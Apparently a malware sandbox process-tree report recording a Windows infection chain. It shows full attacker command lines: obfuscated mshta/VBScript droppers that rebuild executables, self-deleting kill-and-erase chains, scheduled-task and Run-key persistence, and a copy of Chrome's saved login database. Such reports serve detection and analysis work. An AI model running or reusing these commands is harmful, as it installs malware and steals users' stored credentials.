C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff785dc9e70,0x7ff785dc9e80,0x7ff785dc9e9010⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1732,13450803032759380374,11374153478421282962,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7508_508508207" --mojo-platform-channel-handle=1748 /prefetch:89⤵
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b3a5ca1a712d390.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09b3a5ca1a712d390.exeWed09b3a5ca1a712d390.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\485024.exe"C:\Users\Admin\AppData\Roaming\485024.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\5661510.exe"C:\Users\Admin\AppData\Roaming\5661510.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\838218.exe"C:\Users\Admin\AppData\Roaming\838218.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\4220952.exe"C:\Users\Admin\AppData\Roaming\4220952.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed094c47c32b.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exeWed094c47c32b.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )6⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "" == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed094c47c32b.exe" ) do taskkill -f -im "%~nxL"7⤵
-
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEXYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF "" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF " == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" ) do taskkill -f -im "%~nxL"10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPt: closE ( CrEaTeoBJecT ( "WsCRiPT.ShEll" ). RuN ( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ) )9⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t10⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "11⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"11⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\PEQQN6S.OU11⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im "Wed094c47c32b.exe"8⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09977fdc12334.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09977fdc12334.exeWed09977fdc12334.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\yYo8bW5_Dr75hNsA4MSUHZEb.exe"C:\Users\Admin\Pictures\Adobe Films\yYo8bW5_Dr75hNsA4MSUHZEb.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\TFugsa9rfWRW0F_k6pkijv3W.exe"C:\Users\Admin\Pictures\Adobe Films\TFugsa9rfWRW0F_k6pkijv3W.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\0Bone6aXxnHu42vsLpUqYgSL.exe"C:\Users\Admin\Pictures\Adobe Films\0Bone6aXxnHu42vsLpUqYgSL.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe"C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "c159B_KHXHENlHi35uxznXRu.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\c159B_KHXHENlHi35uxznXRu.exe" & exit7⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "c159B_KHXHENlHi35uxznXRu.exe" /f8⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\Pictures\Adobe Films\cAYo3Q8suZBbt4C5trcF26B3.exe"C:\Users\Admin\Pictures\Adobe Films\cAYo3Q8suZBbt4C5trcF26B3.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\wpbaYsMbAbjbDC4O72ATMD6h.exe"C:\Users\Admin\Documents\wpbaYsMbAbjbDC4O72ATMD6h.exe"7⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\3EfoYFOdZT3aZlcwnqbXQBvX.exe"C:\Users\Admin\Pictures\Adobe Films\3EfoYFOdZT3aZlcwnqbXQBvX.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\xuy1lnmo31svAO6TQH0HiDA2.exe"C:\Users\Admin\Pictures\Adobe Films\xuy1lnmo31svAO6TQH0HiDA2.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe"C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe"8⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\PevlGZ3PxwUKzaOKeJMTqLD6.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "PevlGZ3PxwUKzaOKeJMTqLD6.exe"11⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\5TwQldBBKddT0Pf6ywV7lM59.exe"C:\Users\Admin\Pictures\Adobe Films\5TwQldBBKddT0Pf6ywV7lM59.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\vyW85Es_K5BafN6AHs0gsV64.exe"C:\Users\Admin\Pictures\Adobe Films\vyW85Es_K5BafN6AHs0gsV64.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\SG5COJhctDghfNe0iIIPrpP1.exe"C:\Users\Admin\Pictures\Adobe Films\SG5COJhctDghfNe0iIIPrpP1.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\Pictures\Adobe Films\1rH8LW1EItSD43swbUKqQGai.exe"C:\Users\Admin\Pictures\Adobe Films\1rH8LW1EItSD43swbUKqQGai.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\uX3Qqm8F5HavxjTh58PMEXEs.exe"C:\Users\Admin\Pictures\Adobe Films\uX3Qqm8F5HavxjTh58PMEXEs.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-GV18I.tmp\uX3Qqm8F5HavxjTh58PMEXEs.tmp"C:\Users\Admin\AppData\Local\Temp\is-GV18I.tmp\uX3Qqm8F5HavxjTh58PMEXEs.tmp" /SL5="$5048C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\uX3Qqm8F5HavxjTh58PMEXEs.exe"9⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\is-1N653.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-1N653.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\7-Zip\XFWWFEGLBW\foldershare.exe"C:\Program Files\7-Zip\XFWWFEGLBW\foldershare.exe" /VERYSILENT11⤵
- Checks whether UAC is enabled
-
-
C:\Users\Admin\AppData\Local\Temp\4f-aa555-e46-a8aa5-03139b437fd09\Taegeguxobu.exe"C:\Users\Admin\AppData\Local\Temp\4f-aa555-e46-a8aa5-03139b437fd09\Taegeguxobu.exe"11⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Local\Temp\c7-a3685-951-06084-c1b11b3929c8e\Wadykerulu.exe"C:\Users\Admin\AppData\Local\Temp\c7-a3685-951-06084-c1b11b3929c8e\Wadykerulu.exe"11⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sfs2eall.xor\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\sfs2eall.xor\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\sfs2eall.xor\GcleanerEU.exe /eufive13⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wlsqpbcp.bsq\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\wlsqpbcp.bsq\installer.exeC:\Users\Admin\AppData\Local\Temp\wlsqpbcp.bsq\installer.exe /qn CAMPAIGN="654"13⤵
- Checks whether UAC is enabled
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exeC:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exe13⤵
-
C:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exe"C:\Users\Admin\AppData\Local\Temp\2mko0lbq.vno\any.exe" -u14⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ksk5lj04.13h\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ksk5lj04.13h\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ksk5lj04.13h\gcleaner.exe /mixfive13⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oovml3wk.oru\autosubplayer.exe /S & exit12⤵
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hQY_5vZdHcrPiZuBxYXCjhA9.exe"C:\Users\Admin\Pictures\Adobe Films\hQY_5vZdHcrPiZuBxYXCjhA9.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\hQY_5vZdHcrPiZuBxYXCjhA9.exe"C:\Users\Admin\Pictures\Adobe Films\hQY_5vZdHcrPiZuBxYXCjhA9.exe" -u9⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe"C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im mBeq4rQAAJTfUezIixpwFY0d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\mBeq4rQAAJTfUezIixpwFY0d.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mBeq4rQAAJTfUezIixpwFY0d.exe /f8⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09abf83d9c2.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09b2a8bc4f16cb.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09d27135e5a8b3b.exe4⤵
-
-
-
-
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\ck_6NCtiU3bUjW3jzeMQBw0u.exe"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵
-
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵
-
-
-
C:\Windows\SysWOW64\autochk.exe"C:\Windows\SysWOW64\autochk.exe"2⤵
-
-
C:\Windows\SysWOW64\chkdsk.exe"C:\Windows\SysWOW64\chkdsk.exe"2⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\control.exe"C:\Windows\SysWOW64\control.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\A8A6.exeC:\Users\Admin\AppData\Local\Temp\A8A6.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\A8A6.exeC:\Users\Admin\AppData\Local\Temp\A8A6.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Local\Temp\C1DC.exeC:\Users\Admin\AppData\Local\Temp\C1DC.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\C71D.exeC:\Users\Admin\AppData\Local\Temp\C71D.exe2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\D305.exeC:\Users\Admin\AppData\Local\Temp\D305.exe2⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im D305.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D305.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im D305.exe /f4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DD37.exeC:\Users\Admin\AppData\Local\Temp\DD37.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\5⤵
- Executes dropped EXE
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2618.exeC:\Users\Admin\AppData\Local\Temp\2618.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\3EC2.dll2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
-
-
C:\Users\Admin\AppData\Local\Temp\4386.exeC:\Users\Admin\AppData\Local\Temp\4386.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\743B.exeC:\Users\Admin\AppData\Local\Temp\743B.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\Temp\B0DE.exeC:\Users\Admin\AppData\Local\Temp\B0DE.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\B0DE.exeC:\Users\Admin\AppData\Local\Temp\B0DE.exe3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\a10ad8b7-4b73-4fc7-be07-0e91604e81ac" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\B0DE.exe"C:\Users\Admin\AppData\Local\Temp\B0DE.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\B0DE.exe"C:\Users\Admin\AppData\Local\Temp\B0DE.exe" --Admin IsNotAutoStart IsNotTask5⤵
-
C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe"C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe"C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe"7⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build2.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build3.exe"C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build3.exe"6⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build3.exe"C:\Users\Admin\AppData\Local\0adb3102-17e3-4112-a4ad-24d09b3881f5\build3.exe"7⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"8⤵
- Creates scheduled task(s)
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B92C.exeC:\Users\Admin\AppData\Local\Temp\B92C.exe2⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im B92C.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B92C.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im B92C.exe /f4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BCF6.exeC:\Users\Admin\AppData\Local\Temp\BCF6.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\C3AE.exeC:\Users\Admin\AppData\Local\Temp\C3AE.exe2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE ( CReateobjECT( "WscRipT.SHeLl" ). rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\C3AE.exe"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF """"=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\C3AE.exe"" ) do taskkill /iM ""%~nXN"" -f " ,0 , TrUE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\C3AE.exe" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd& iF ""=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\C3AE.exe" ) do taskkill /iM "%~nXN" -f4⤵
-
C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXEMXB89oH1.eXE /poMZbeSahrmSD~4GRjd5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE ( CReateobjECT( "WscRipT.SHeLl" ). rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF ""/poMZbeSahrmSD~4GRjd""=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" ) do taskkill /iM ""%~nXN"" -f " ,0 , TrUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd& iF "/poMZbeSahrmSD~4GRjd"=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE" ) do taskkill /iM "%~nXN" -f7⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRipt: cLosE (CREateoBJEcT ( "wscRiPt.shElL" ). ruN ( "cMD /q /r EcHO | SeT /p = ""MZ"" > 5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3 + TBFC27.HKL + G2K6.CP + P1JSBZHT.GQ + KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ " , 0, TRue ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r EcHO | SeT /p = "MZ" >5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3 + TBFC27.HKL+ G2K6.CP + P1JSBZHT.GQ + KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>5XGGA_QU.T"8⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\YFYnG.AJ8⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "C3AE.exe" -f5⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C729.exeC:\Users\Admin\AppData\Local\Temp\C729.exe2⤵
-
-
C:\Program Files (x86)\O9r6hzlkh\_jxt0z7tbh.exe"C:\Program Files (x86)\O9r6hzlkh\_jxt0z7tbh.exe"2⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
